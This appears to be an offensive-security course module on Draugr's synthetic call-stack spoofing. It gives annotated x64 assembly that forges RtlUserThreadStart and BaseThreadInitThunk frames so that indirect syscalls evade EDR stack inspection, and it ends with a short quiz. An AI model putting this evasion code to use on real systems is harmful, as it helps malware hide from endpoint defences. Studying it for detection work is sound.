Module 6: Synthetic Frame Construction
Building a three-layer fake stack that survives full unwinding — one precise sub rsp at a time.
Module Overview
This is the core of Draugr. The Spoof assembly routine constructs a three-layer synthetic stack beneath the current execution point. Each layer represents a fake call frame for a legitimate Windows function. When the syscall executes and an EDR walks the stack, it sees: the current function called through BaseThreadInitThunk, which was called by RtlUserThreadStart — exactly what every normal thread looks like. This module walks through each layer, byte by byte.
The Three-Layer Stack Layout
The synthetic stack is constructed from the bottom up (highest address to lowest). The final RSP after construction points to the very top — the gadget address that will be popped by RET after the syscall returns.
Complete Synthetic Stack (Top to Bottom)
Construction Order
The stack grows downward on x64 (lower addresses = newer frames). Draugr builds from the bottom up:
- NULL terminator — pushed first (highest address)
- 0x200 buffer — RSP decremented by 512 bytes
- RtlUserThreadStart frame — RSP decremented by calculated frame size
- BaseThreadInitThunk frame — RSP decremented by calculated frame size
- Gadget address — pushed last (lowest address, top of stack)
Layer 1: The Reserved Buffer (0x200 Bytes)
The first allocation after the NULL terminator is a 512-byte reserved buffer at the base of the synthetic stack.
ASM - Buffer allocation ; Push NULL terminator first (base of stack)
xor rax, rax
push rax ; [rsp] = 0x0 (NULL)
; Allocate 0x200 bytes of buffer space
sub rsp, 0x200 ; RSP -= 512
Purpose of the Buffer
This 512-byte region provides working space and separation between the NULL terminator and the synthetic frames. Some stack-walking implementations may read memory below the bottom frame. The buffer ensures these reads hit zeroed or benign memory rather than unmapped pages. It also provides alignment padding and prevents the synthetic frames from being immediately adjacent to the stack terminator, which could look suspicious under heuristic analysis.
Layer 2: RtlUserThreadStart Frame
The second layer creates a fake frame for ntdll!RtlUserThreadStart. This is the function that Windows calls to start every user-mode thread. Its frame sits at the bottom of every legitimate call stack.
ASM - RtlUserThreadStart synthetic frame ; Load RtlUserThreadStart frame size from PRM
mov r12, [rbx + 0x48] ; R12 = RtlUserThreadStart_Size
; Allocate the frame
sub rsp, r12 ; RSP -= frame size
; Write the fake return address at the top of this frame
mov r13, [rbx + 0x58] ; R13 = RtlUserThreadStart + 0x21
mov [rsp], r13 ; [RSP] = fake return address
What This Creates
After this code executes, the stack contains a frame that is exactly the size that Windows expects for RtlUserThreadStart. At the top of this frame (lowest address) sits the return address RtlUserThreadStart+0x21. When the stack unwinder processes this frame, it reads the return address, looks up the RUNTIME_FUNCTION for the address, and uses the UNWIND_CODEs to determine how many bytes to skip. Because Draugr calculated the exact same size from the exact same UNWIND_CODEs, the unwinder lands precisely at the NULL terminator — the expected end of the stack.
Layer 3: BaseThreadInitThunk Frame
On top of the RtlUserThreadStart frame, Draugr builds the kernel32!BaseThreadInitThunk frame. In a real thread, this function is called by RtlUserThreadStart and in turn calls the thread's entry point.
ASM - BaseThreadInitThunk synthetic frame ; Load BaseThreadInitThunk frame size from PRM
mov r14, [rbx + 0x40] ; R14 = BaseThreadInitThunk_Size
; Allocate the frame
sub rsp, r14 ; RSP -= frame size
; Write the fake return address at the top of this frame
mov r15, [rbx + 0x50] ; R15 = BaseThreadInitThunk + 0x14
mov [rsp], r15 ; [RSP] = fake return address
Frame Chain
Now the stack unwinder sees a chain: the current frame's return address is BaseThreadInitThunk+0x14. Unwinding that frame (by its UNWIND_CODEs) reveals a return address of RtlUserThreadStart+0x21. Unwinding that frame reveals the NULL terminator. This is identical to what a real thread's stack looks like — the EDR cannot distinguish this synthetic chain from a genuine one.
Unwinder's View of the Synthetic Stack
ret = BaseThreadInitThunk+0x14
ret = RtlUserThreadStart+0x21
ret = 0x0 (NULL)
NULL = end of stack
The Gadget Frame
The final element placed on the stack is the gadget address. This sits at the very top of the synthetic stack (the lowest address). When the syscall returns, the CPU's RET instruction pops this address into RIP.
ASM - Pushing the gadget ; Load gadget address from PRM
mov rax, [rbx + 0x60] ; RAX = gadget address (JMP [RBX])
; Push it as the return address for the syscall
push rax ; [RSP] = gadget address
Critical Ordering
The gadget address must be the last thing pushed. RSP points to it at the time the syscall instruction executes. When the syscall returns, RET pops the top of the stack into RIP. If the gadget is not at the top, the CPU would jump to the wrong address — either a fake return address or garbage — and crash immediately.
The NULL Terminator
A zero value (0x0) is placed at the very bottom of the synthetic stack, below the 0x200 buffer. This serves as a stack walk terminator.
Why NULL Stops the Walk
Windows stack walking functions like RtlWalkFrameChain and RtlCaptureStackBackTrace iterate through frames by following return addresses. When they encounter a return address of 0x0, they interpret it as the end of the stack and stop. Without this terminator, the walker would continue past the synthetic frames into uncontrolled memory — either reading garbage that exposes the spoof, or causing an access violation.
Real Threads Have This Too
On a genuine Windows thread, the bottom of the stack also terminates with a NULL return address. The OS sets this up when it creates the thread's stack. Draugr replicates this behavior exactly, so even the termination condition is indistinguishable from a real stack.
Stack Argument Copying
The x64 Windows calling convention passes the first four arguments in registers (RCX, RDX, R8, R9). Arguments 5 and beyond are passed on the stack. When Draugr replaces the real stack with the synthetic one, any stack-based arguments must be copied to the correct positions in the new stack.
ASM - Stack argument copying (for >4 argument syscalls) ; The PRM contains all arguments at offset 0x78+
; Arguments 1-4 go in registers (handled separately)
; Arguments 5+ must be placed on the stack at [RSP+0x28], [RSP+0x30], etc.
; Check if there are stack arguments
mov rcx, [rbx + 0x78] ; arg1 (will go in RCX later)
mov rdx, [rbx + 0x80] ; arg2 (will go in RDX later)
mov r8, [rbx + 0x88] ; arg3 (will go in R8 later)
mov r9, [rbx + 0x90] ; arg4 (will go in R9 later)
; Copy stack arguments (arg5, arg6, ...) to the synthetic stack
; Stack slots at [RSP+0x28], [RSP+0x30], [RSP+0x38], ...
mov rax, [rbx + 0x98] ; arg5
mov [rsp + 0x28], rax
mov rax, [rbx + 0xA0] ; arg6
mov [rsp + 0x30], rax
; ... additional arguments as needed
Why 0x28 and Not 0x20?
The x64 calling convention reserves 32 bytes (0x20) of shadow space on the stack above the return address. Arguments 5+ start at [RSP + 0x28] (shadow space + 8 bytes for the return address). Draugr must respect this layout exactly, or the kernel function will read the wrong values for parameters 5 and beyond. Functions like NtAllocateVirtualMemory take 6 arguments, so getting this right is critical.
Assembly Walkthrough: Complete Construction
Here is the full sequence from the Spoof routine that builds the synthetic stack, loads register arguments, and jumps to the syscall instruction. Read top to bottom — each instruction is annotated with its purpose.
ASM - Stub.s: Synthetic Stack Construction ; ---- Save original state ----
mov rbx, rcx ; RBX = &PRM (anchor pointer)
mov rax, [rsp] ; Save original return address
mov [rbx + 0x08], rax ; PRM.OG_retaddr = original return
; ---- Save non-volatile registers ----
mov [rbx + 0x10], rdi
mov [rbx + 0x18], rsi
mov [rbx + 0x20], r12
mov [rbx + 0x28], r13
mov [rbx + 0x30], r14
mov [rbx + 0x38], r15
; ---- Layer 0: NULL terminator ----
xor rax, rax
push rax ; Stack bottom = 0x0
; ---- Layer 1: Reserved buffer ----
sub rsp, 0x200 ; 512 bytes of padding
; ---- Layer 2: RtlUserThreadStart frame ----
mov r12, [rbx + 0x48] ; R12 = RtlUserThreadStart frame size
sub rsp, r12 ; Allocate frame
mov r13, [rbx + 0x58] ; R13 = RtlUserThreadStart + 0x21
mov [rsp], r13 ; Write fake return address
; ---- Layer 3: BaseThreadInitThunk frame ----
mov r14, [rbx + 0x40] ; R14 = BaseThreadInitThunk frame size
sub rsp, r14 ; Allocate frame
mov r15, [rbx + 0x50] ; R15 = BaseThreadInitThunk + 0x14
mov [rsp], r15 ; Write fake return address
; ---- Gadget: top of stack ----
mov rax, [rbx + 0x60] ; RAX = gadget address (JMP [RBX])
push rax ; RSP now points to gadget
; ---- Load syscall arguments into registers ----
mov r10, [rbx + 0x78] ; R10 = arg1 (R10, not RCX for syscall)
mov rdx, [rbx + 0x80] ; RDX = arg2
mov r8, [rbx + 0x88] ; R8 = arg3
mov r9, [rbx + 0x90] ; R9 = arg4
; ---- Load SSN and jump to syscall ----
mov rax, [rbx + 0x68] ; RAX = System Service Number
mov r11, [rbx + 0x70] ; R11 = syscall instruction address
jmp r11 ; Jump to: syscall; ret in ntdll
Why R10 Instead of RCX?
In the Windows syscall convention, the kernel expects the first argument in R10, not RCX. This is because the syscall instruction itself uses RCX to store the return address (RIP). The standard ntdll stub does mov r10, rcx before the syscall. Since Draugr jumps directly to the syscall instruction (bypassing the stub preamble), it must place the first argument in R10 manually.
Why JMP Instead of CALL?
The Spoof routine uses jmp r11 (not call r11) to reach the syscall instruction. A CALL would push an additional return address onto the stack, misaligning the carefully constructed synthetic stack. The JMP transfers control without modifying RSP. The syscall instruction in ntdll is followed by RET, which will pop the gadget address from RSP — exactly as intended.
Module 6 Quiz: Synthetic Frame Construction
Q1: In what order are the synthetic stack layers constructed (first pushed to last pushed)?
Q2: What is the purpose of the NULL terminator at the bottom of the synthetic stack?
Q3: Why must each synthetic frame be exactly the size calculated from the target function's UNWIND_CODEs?